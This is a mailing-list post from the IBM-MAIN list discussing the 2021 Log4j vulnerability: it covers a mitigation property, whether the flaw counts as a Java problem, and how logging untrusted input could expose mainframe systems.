On 12/12/2021 1:20 pm, David Crayford wrote:
Fingers crossed! The truth is almost no mainframe network (worth its
salt) is visible to outside world. But that doesn't stop the public
servers being compromised.
A quick fix if you are unable to update to the patched version is to
use the following Java property:
‐Dlog4j2.formatMsgNoLookups=True
It seems slightly unfair to call this a Java vulnerability. It's a
vulnerability in a package written in Java (albeit widely used). If this
is a Java vulnerability, how many C/C++ or even assembler
vulnerabilities have we seen?
*My understanding* is that the vulnerability can be exploited if you log
data that comes from untrusted sources, e.g. user input like URLs, http
headers, perhaps even invalid userids from login attempts?? So I think
it could be potentially exploited on the mainframe if user input is
passed from a front end and logged on the mainframe. The front end
wouldn't need to be written in Java - just the component doing the
logging. Direct network access and visibility to the outside world is
not required. I think outbound access *is* required for the exploit.
Conceptually it seems similar to SQL injection attacks. Among other
things, it highlights the danger of working with data from untrusted
sources including http requests, login attempts, etc.
--
Andrew Rowley
Black Hill Software
----------------------------------------------------------------------
For IBM-MAIN subscribe / signoff / archive access instructions,
send email to [email protected] with the message: INFO IBM-MAIN
